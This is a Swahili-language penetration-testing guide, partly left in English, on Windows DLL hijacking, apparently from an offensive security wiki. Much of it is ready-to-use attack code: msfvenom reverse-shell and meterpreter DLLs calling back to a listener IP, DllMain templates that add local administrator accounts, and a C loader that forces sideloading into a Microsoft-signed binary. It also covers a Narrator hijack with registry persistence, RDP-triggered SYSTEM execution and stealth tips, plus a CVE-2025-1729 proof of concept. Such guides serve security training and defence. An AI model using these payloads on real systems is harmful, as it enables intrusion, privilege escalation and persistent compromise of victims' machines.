Dll Hijacking

Reading time: 17 minutes

Maelezo ya Msingi

DLL Hijacking inahusisha kuendesha programu iliyoaminika ili iingize DLL yenye nia mbaya. Neno hili linajumuisha mbinu kadhaa kama DLL Spoofing, Injection, and Side-Loading. Inatumika hasa kwa ajili ya code execution, kupata persistence, na, mara chache, privilege escalation. Licha ya mkazo kwenye escalation hapa, mbinu ya hijacking inabaki ile ile kwa malengo yote.

Mbinu Za Kawaida

Kuna mbinu kadhaa zinazotumiwa kwa DLL hijacking, kila moja ikiwa na ufanisi wake kulingana na mkakati wa programu wa kupakia DLL:

1. DLL Replacement: Kubadilisha DLL halali na moja yenye nia mbaya, hiari kutumia DLL Proxying ili kuhifadhi utendakazi wa DLL asilia.
2. DLL Search Order Hijacking: Kuweka DLL yenye nia mbaya katika njia ya utafutaji mbele ya ile halali, ukitumia muundo wa utafutaji wa programu.
3. Phantom DLL Hijacking: Kuunda DLL yenye nia mbaya ambayo programu itaikadiria kuwa ni DLL inayohitajika ambayo haipo.
4. DLL Redirection: Kubadilisha vigezo vya utafutaji kama %PATH% au faili za .exe.manifest / .exe.local ili kuelekeza programu kwenye DLL yenye nia mbaya.
5. WinSxS DLL Replacement: Kufyeka DLL halali kwa toleo lenye nia mbaya katika saraka ya WinSxS, njia inayohusiana mara nyingi na DLL side-loading.
6. Relative Path DLL Hijacking: Kuweka DLL yenye nia mbaya katika saraka inayodhibitiwa na mtumiaji pamoja na programu iliyokopiwa, ikifanana na mbinu za Binary Proxy Execution.

Finding missing Dlls

Njia ya kawaida ya kupata Dll zilizokosekana ndani ya mfumo ni kuendesha procmon kutoka sysinternals, kuweka vichujio vifuatavyo 2:

na kishaonyesha tu Shughuli za Mfumo wa Faili:

Ikiwa unatafuta dlls zilizokosekana kwa ujumla unaacha hii ikiendesha kwa sekunde chache.
Ikiwa unatafuta dll iliyokosekana ndani ya executable maalum unapaswa kuweka chujio nyingine kama "Process Name" "contains" <exec name>, kuitekeleza, na kuacha kunasa matukio.

Exploiting Missing Dlls

Ili kuongeza privileges, nafasi bora sisi tunaweza kuwa nayo ni kuwa na uwezo wa kuandika dll ambayo mchakato wenye privilege atajaribu kuipakia katika baadhi ya mahali ambapo itatafutwa. Kwa hivyo, tutaweza kuandika dll katika folda ambapo dll inatafutwa kabla ya folda ambapo dll ya asili iko (hali isiyo ya kawaida), au tutakuwa na uwezo wa kuandika kwenye folda fulani ambapo dll itatafutwa na dll asilia haipo katika folda yoyote.

Dll Search Order

Ndani ya Microsoft documentation unaweza kuona jinsi DLL zinavyopakiwa kwa undani.

Programu za Windows zinatafuta DLL kwa kufuata seti ya njia za utafutaji zilizowekwa kabla, zikizingatia mfuatano maalum. Tatizo la DLL hijacking linapotokea ni pale DLL yenye hatari imewekwa kwa mkakati katika moja ya saraka hizi, kuhakikisha inapakiwa kabla ya DLL halali. Suluhu ya kuzuia hili ni kuhakikisha programu inatumia paths kamili (absolute paths) inaporejea kwa DLL zinazohitaji.

Unaweza kuona mfuatano wa utafutaji wa DLL kwa mifumo ya 32-bit hapa chini:

1. The directory from which the application loaded.
2. The system directory. Use the GetSystemDirectory function to get the path of this directory.(C:\Windows\System32)
3. The 16-bit system directory. There is no function that obtains the path of this directory, but it is searched. (C:\Windows\System)
4. The Windows directory. Use the GetWindowsDirectory function to get the path of this directory.
5. (C:\Windows)
6. The current directory.
7. The directories that are listed in the PATH environment variable. Note that this does not include the per-application path specified by the App Paths registry key. The App Paths key is not used when computing the DLL search path.

Huo ndio mfuatano wa utafutaji wa default wakati SafeDllSearchMode imewezeshwa. Wakati haijawezeshwa current directory inapata nafasi ya pili. Ili kuzima kipengele hiki, tengeneza thamani ya rejista HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\SafeDllSearchMode na uiweke kuwa 0 (chaguomsingi ni kuwezeshwa).

Ikiwa LoadLibraryEx inaitwa na LOAD_WITH_ALTERED_SEARCH_PATH utafutaji unaanza katika saraka ya module ya executable ambayo LoadLibraryEx inayoipakia.

Hatimaye, kumbuka kwamba dll inaweza kupakiwa ikielezwa path kamili badala ya jina pekee. Katika hali hiyo dll hiyo itabebwa tu katika path hiyo (ikiwa dll ina dependencies, zitatafutwa kama zilivyopakiwa kwa jina pekee).

Kuna njia nyingine za kubadilisha mfuatano wa utafutaji lakini sitazielezea hapa.

Forcing sideloading via RTL_USER_PROCESS_PARAMETERS.DllPath

Njia ya juu ya kuamua kwa uhakika jinsi ya kuathiri DLL search path ya mchakato mpya iliyoundwa ni kuweka uwanja DllPath katika RTL_USER_PROCESS_PARAMETERS wakati wa kuunda mchakato kwa native APIs za ntdll. Kwa kutoa saraka inayoathiriwa na mshambuliaji hapa, mchakato lengwa ambao unasuluhisha DLL iliyojumuishwa kwa jina (bila path kamili na bila kutumia safe loading flags) unaweza kulazimishwa kupakia DLL yenye nia mbaya kutoka saraka hiyo.

Key idea

• Build the process parameters with RtlCreateProcessParametersEx and provide a custom DllPath that points to your controlled folder (e.g., the directory where your dropper/unpacker lives).
• Create the process with RtlCreateUserProcess. When the target binary resolves a DLL by name, the loader will consult this supplied DllPath during resolution, enabling reliable sideloading even when the malicious DLL is not colocated with the target EXE.

Notes/limitations

• This affects the child process being created; it is different from SetDllDirectory, which affects the current process only.
• The target must import or LoadLibrary a DLL by name (no absolute path and not using LOAD_LIBRARY_SEARCH_SYSTEM32/SetDefaultDllDirectories).
• KnownDLLs and hardcoded absolute paths cannot be hijacked. Forwarded exports and SxS may change precedence.

Minimal C example (ntdll, wide strings, simplified error handling):

#include <windows.h>
#include <winternl.h>
#pragma comment(lib, "ntdll.lib")

// Prototype (not in winternl.h in older SDKs)
typedef NTSTATUS (NTAPI *RtlCreateProcessParametersEx_t)(
PRTL_USER_PROCESS_PARAMETERS *pProcessParameters,
PUNICODE_STRING ImagePathName,
PUNICODE_STRING DllPath,
PUNICODE_STRING CurrentDirectory,
PUNICODE_STRING CommandLine,
PVOID Environment,
PUNICODE_STRING WindowTitle,
PUNICODE_STRING DesktopInfo,
PUNICODE_STRING ShellInfo,
PUNICODE_STRING RuntimeData,
ULONG Flags
);

typedef NTSTATUS (NTAPI *RtlCreateUserProcess_t)(
PUNICODE_STRING NtImagePathName,
ULONG Attributes,
PRTL_USER_PROCESS_PARAMETERS ProcessParameters,
PSECURITY_DESCRIPTOR ProcessSecurityDescriptor,
PSECURITY_DESCRIPTOR ThreadSecurityDescriptor,
HANDLE ParentProcess,
BOOLEAN InheritHandles,
HANDLE DebugPort,
HANDLE ExceptionPort,
PRTL_USER_PROCESS_INFORMATION ProcessInformation
);

static void DirFromModule(HMODULE h, wchar_t *out, DWORD cch) {
DWORD n = GetModuleFileNameW(h, out, cch);
for (DWORD i=n; i>0; --i) if (out[i-1] == L'\\') { out[i-1] = 0; break; }
}

int wmain(void) {
// Target Microsoft-signed, DLL-hijackable binary (example)
const wchar_t *image = L"\\??\\C:\\Program Files\\Windows Defender Advanced Threat Protection\\SenseSampleUploader.exe";

// Build custom DllPath = directory of our current module (e.g., the unpacked archive)
wchar_t dllDir[MAX_PATH];
DirFromModule(GetModuleHandleW(NULL), dllDir, MAX_PATH);

UNICODE_STRING uImage, uCmd, uDllPath, uCurDir;
RtlInitUnicodeString(&uImage, image);
RtlInitUnicodeString(&uCmd, L"\"C:\\Program Files\\Windows Defender Advanced Threat Protection\\SenseSampleUploader.exe\"");
RtlInitUnicodeString(&uDllPath, dllDir);      // Attacker-controlled directory
RtlInitUnicodeString(&uCurDir, dllDir);

RtlCreateProcessParametersEx_t pRtlCreateProcessParametersEx =
(RtlCreateProcessParametersEx_t)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "RtlCreateProcessParametersEx");
RtlCreateUserProcess_t pRtlCreateUserProcess =
(RtlCreateUserProcess_t)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "RtlCreateUserProcess");

RTL_USER_PROCESS_PARAMETERS *pp = NULL;
NTSTATUS st = pRtlCreateProcessParametersEx(&pp, &uImage, &uDllPath, &uCurDir, &uCmd,
NULL, NULL, NULL, NULL, NULL, 0);
if (st < 0) return 1;

RTL_USER_PROCESS_INFORMATION pi = {0};
st = pRtlCreateUserProcess(&uImage, 0, pp, NULL, NULL, NULL, FALSE, NULL, NULL, &pi);
if (st < 0) return 1;

// Resume main thread etc. if created suspended (not shown here)
return 0;
}

Operational usage example

• Place a malicious xmllite.dll (exporting the required functions or proxying to the real one) in your DllPath directory.
• Launch a signed binary known to look up xmllite.dll by name using the above technique. The loader resolves the import via the supplied DllPath and sideloads your DLL.

This technique has been observed in-the-wild to drive multi-stage sideloading chains: an initial launcher drops a helper DLL, which then spawns a Microsoft-signed, hijackable binary with a custom DllPath to force loading of the attacker’s DLL from a staging directory.

Exceptions on dll search order from Windows docs

Certain exceptions to the standard DLL search order are noted in Windows documentation:

• When a DLL that shares its name with one already loaded in memory is encountered, the system bypasses the usual search. Instead, it performs a check for redirection and a manifest before defaulting to the DLL already in memory. In this scenario, the system does not conduct a search for the DLL.
• In cases where the DLL is recognized as a known DLL for the current Windows version, the system will utilize its version of the known DLL, along with any of its dependent DLLs, forgoing the search process. The registry key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs holds a list of these known DLLs.
• Should a DLL have dependencies, the search for these dependent DLLs is conducted as though they were indicated only by their module names, regardless of whether the initial DLL was identified through a full path.

Escalating Privileges

Requirements:

• Identify a process that operates or will operate under different privileges (horizontal or lateral movement), which is lacking a DLL.
• Ensure write access is available for any directory in which the DLL will be searched for. This location might be the directory of the executable or a directory within the system path.

Ndiyo, masharti ni magumu kuyapata kwa sababu kwa chaguo-msingi ni aina ya ajabu kupata executable yenye cheo ambayo inakosa DLL na ni ajabu zaidi kuwa na ruhusa za kuandika kwenye folda ya system path (huwezi kwa chaguo-msingi). Lakini, katika mazingira yaliyopangwa vibaya hii inawezekana.
In the case you are lucky and you find yourself meeting the requirements, you could check the UACME project. Even if the main goal of the project is bypass UAC, you may find there a PoC of a Dll hijaking for the Windows version that you can use (probably just changing the path of the folder where you have write permissions).

Note that you can check your permissions in a folder doing:

accesschk.exe -dqv "C:\Python27"
icacls "C:\Python27"

Na angalia ruhusa za folda zote ndani ya PATH:

for %%A in ("%path:;=";"%") do ( cmd.exe /c icacls "%%~A" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && echo. )

Unaweza pia kuangalia imports za executable na exports za dll kwa:

dumpbin /imports C:\path\Tools\putty\Putty.exe
dumpbin /export /path/file.dll

Kwa mwongozo kamili wa jinsi ya abuse Dll Hijacking to escalate privileges ikiwa una ruhusa za kuandika katika System Path folder angalia:

Writable Sys Path +Dll Hijacking Privesc

Zana za kiotomatiki

Winpeas will check if you have write permissions on any folder inside system PATH.
Zana nyingine za kiotomatiki za kuvutia za kugundua udhaifu huu ni PowerSploit functions: Find-ProcessDLLHijack, Find-PathDLLHijack and Write-HijackDll.

Mfano

Ikiwa utapata hali inayoweza kutumiwa, mojawapo ya mambo muhimu zaidi ya kuifanya iwe ya mafanikio ni kuunda dll ambayo inatoa angalau kazi zote ambazo executable itaziingiza kutoka kwake. Hata hivyo, kumbuka kwamba Dll Hijacking inaweza kutumika ili escalate from Medium Integrity level to High (bypassing UAC) au kutoka High Integrity to SYSTEM. Unaweza kupata mfano wa jinsi ya kuunda dll halali ndani ya utafiti huu wa dll hijacking uliolenga dll hijacking kwa ajili ya utekelezaji: https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows.
Zaidi ya hayo, katika sehemu inayofuatin unaweza kupata baadhi ya misimbo ya msingi ya dll ambayo inaweza kuwa muhimu kama templates au kuunda dll yenye kazi ambazo si lazima zitoa.

Creating and compiling Dlls

Dll Proxifying

Basically a Dll proxy is a Dll capable of execute your malicious code when loaded but also to expose and work as exected by relaying all the calls to the real library.

With the tool DLLirant or Spartacus you can actually indicate an executable and select the library you want to proxify and generate a proxified dll or indicate the Dll and generate a proxified dll.

Meterpreter

Get rev shell (x64):

msfvenom -p windows/x64/shell/reverse_tcp LHOST=192.169.0.100 LPORT=4444 -f dll -o msf.dll

Pata meterpreter (x86):

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.169.0.100 LPORT=4444 -f dll -o msf.dll

Unda mtumiaji (x86 sikuwona toleo la x64):

msfvenom -p windows/adduser USER=privesc PASS=Attacker@123 -f dll -o msf.dll

Yako mwenyewe

Tambua kwamba katika matukio kadhaa Dll unayoi-compile lazima export several functions ambazo zitatumika na victim process; ikiwa functions hizi hazipo, binary won't be able to load nao na exploit will fail.

// Tested in Win10
// i686-w64-mingw32-g++ dll.c -lws2_32 -o srrstr.dll -shared
#include <windows.h>
BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved){
switch(dwReason){
case DLL_PROCESS_ATTACH:
system("whoami > C:\\users\\username\\whoami.txt");
WinExec("calc.exe", 0); //This doesn't accept redirections like system
break;
case DLL_PROCESS_DETACH:
break;
case DLL_THREAD_ATTACH:
break;
case DLL_THREAD_DETACH:
break;
}
return TRUE;
}

// For x64 compile with: x86_64-w64-mingw32-gcc windows_dll.c -shared -o output.dll
// For x86 compile with: i686-w64-mingw32-gcc windows_dll.c -shared -o output.dll

#include <windows.h>
BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved){
if (dwReason == DLL_PROCESS_ATTACH){
system("cmd.exe /k net localgroup administrators user /add");
ExitProcess(0);
}
return TRUE;
}

//x86_64-w64-mingw32-g++ -c -DBUILDING_EXAMPLE_DLL main.cpp
//x86_64-w64-mingw32-g++ -shared -o main.dll main.o -Wl,--out-implib,main.a

#include <windows.h>

int owned()
{
WinExec("cmd.exe /c net user cybervaca Password01 ; net localgroup administrators cybervaca /add", 0);
exit(0);
return 0;
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
{
owned();
return 0;
}

//Another possible DLL
// i686-w64-mingw32-gcc windows_dll.c -shared -lws2_32 -o output.dll

#include<windows.h>
#include<stdlib.h>
#include<stdio.h>

void Entry (){ //Default function that is executed when the DLL is loaded
system("cmd");
}

BOOL APIENTRY DllMain (HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
switch (ul_reason_for_call){
case DLL_PROCESS_ATTACH:
CreateThread(0,0, (LPTHREAD_START_ROUTINE)Entry,0,0,0);
break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DEATCH:
break;
}
return TRUE;
}

Uchambuzi wa Kesi: Narrator OneCore TTS Localization DLL Hijack (Accessibility/ATs)

Windows Narrator.exe bado inatafuta DLL ya localization inayotegemea lugha na inayoweza kutabiriwa wakati wa kuanzishwa; DLL hii inaweza kufanywa DLL Hijack ili kuruhusu arbitrary code execution na persistence.

Mambo muhimu

• Probe path (current builds): %windir%\System32\speech_onecore\engines\tts\msttsloc_onecoreenus.dll (EN-US).
• Legacy path (older builds): %windir%\System32\speech\engine\tts\msttslocenus.dll.
• Ikiwa DLL inayoweza kuandikwa na kudhibitiwa na mshambulizi ipo kwenye path ya OneCore, inaloadiwa na DllMain(DLL_PROCESS_ATTACH) inatekelezwa. Hakuna exports zinahitajika.

Ugundaji kwa Procmon

• Chujio: Process Name is Narrator.exe and Operation is Load Image or CreateFile.
• Anzisha Narrator na angalia jaribio la ku-load njia iliyotajwa hapo juu.

DLL ndogo

// Build as msttsloc_onecoreenus.dll and place in the OneCore TTS path
BOOL WINAPI DllMain(HINSTANCE h, DWORD r, LPVOID) {
if (r == DLL_PROCESS_ATTACH) {
// Optional OPSEC: DisableThreadLibraryCalls(h);
// Suspend/quiet Narrator main thread, then run payload
// (see PoC for implementation details)
}
return TRUE;
}

OPSEC silence

• A naive hijack itazungumza/kuangazia UI. Ili kubaki kimya, unapounganisha orodhesha Narrator threads, fungua thread kuu (OpenThread(THREAD_SUSPEND_RESUME)) na SuspendThread kwake; endelea katika thread yako mwenyewe. Tazama PoC kwa msimbo kamili.

Trigger and persistence via Accessibility configuration

• User context (HKCU): reg add "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility" /v configuration /t REG_SZ /d "Narrator" /f
• Winlogon/SYSTEM (HKLM): reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility" /v configuration /t REG_SZ /d "Narrator" /f
• Kwa yale yaliyotajwa, kuanzisha Narrator kunapakia DLL iliyowekwa. Kwenye secure desktop (logon screen), bonyeza CTRL+WIN+ENTER kuanzisha Narrator.

RDP-triggered SYSTEM execution (lateral movement)

• Allow classic RDP security layer: reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t REG_DWORD /d 0 /f
• Ungana kwa RDP kwenye host; kwenye skrini ya kuingia bonyeza CTRL+WIN+ENTER ili kuzindua Narrator; DLL yako inatekelezwa kama SYSTEM kwenye secure desktop.
• Utekelezaji unaacha wakati kikao cha RDP kinapofungwa — inject/migrate haraka.

Bring Your Own Accessibility (BYOA)

• Unaweza kunakili kipengele cha rejista cha built-in Accessibility Tool (AT) (mfano, CursorIndicator), kuhariri ili kipeleke kwenye binary/DLL yoyote, kuingiza, kisha kuweka configuration kwa jina hilo la AT. Hii inaruhusu utekelezaji wowote kupitia mfumo wa Accessibility.

Notes

• Kuandika chini ya %windir%\System32 na kubadili thamani za HKLM kunahitaji haki za admin.
• Mantiki yote ya payload inaweza kuishi katika DLL_PROCESS_ATTACH; hakuna exports zinazohitajika.

Case Study: CVE-2025-1729 - Privilege Escalation Using TPQMAssistant.exe

Kesi hii inaonyesha Phantom DLL Hijacking katika TrackPoint Quick Menu ya Lenovo (TPQMAssistant.exe), inafuatiliwa kama CVE-2025-1729.

Vulnerability Details

• Component: TPQMAssistant.exe located at C:\ProgramData\Lenovo\TPQM\Assistant\.
• Scheduled Task: Lenovo\TrackPointQuickMenu\Schedule\ActivationDailyScheduleTask runs daily at 9:30 AM under the context of the logged-on user.
• Directory Permissions: Writable by CREATOR OWNER, ikiruhusu watumiaji wa ndani kuweka faili yoyote.
• DLL Search Behavior: Inajaribu kupakia hostfxr.dll kutoka kwenye saraka yake ya kazi kwanza na kurekodi "NAME NOT FOUND" ikiwa haipo, ikionyesha kipaumbele cha utafutaji katika saraka ya ndani.

Exploit Implementation

Mshambuliaji anaweza kuweka stub ya hostfxr.dll yenye madhara katika saraka hiyo hiyo, akitumia DLL iliyokosekana kupata utekelezaji wa msimbo chini ya muktadha wa mtumiaji:

#include <windows.h>

BOOL APIENTRY DllMain(HMODULE hModule, DWORD fdwReason, LPVOID lpReserved) {
if (fdwReason == DLL_PROCESS_ATTACH) {
// Payload: display a message box (proof-of-concept)
MessageBoxA(NULL, "DLL Hijacked!", "TPQM", MB_OK);
}
return TRUE;
}

Mtiririko wa Shambulio

1. Kama mtumiaji wa kawaida, weka hostfxr.dll katika C:\ProgramData\Lenovo\TPQM\Assistant\.
2. Subiri kazi iliyopangwa ifanye kazi saa 9:30 AM kwa muktadha wa mtumiaji wa sasa.
3. Ikiwa msimamizi ameingia wakati kazi inapoendeshwa, DLL hasidi itaendeshwa katika kikao cha msimamizi kwa medium integrity.
4. Unganisha mbinu za kawaida za UAC bypass ili kuinua kutoka medium integrity hadi SYSTEM privileges.

Marejeo

• CVE-2025-1729 - Privilege Escalation Using TPQMAssistant.exe
• Microsoft Store - TPQM Assistant UWP
• https://medium.com/@pranaybafna/tcapt-dll-hijacking-888d181ede8e
• https://cocomelonc.github.io/pentest/2021/09/24/dll-hijacking-1.html
• Check Point Research – Nimbus Manticore Deploys New Malware Targeting Europe
• TrustedSec – Hack-cessibility: When DLL Hijacks Meet Windows Helpers
• PoC – api0cradle/Narrator-dll
• Sysinternals Process Monitor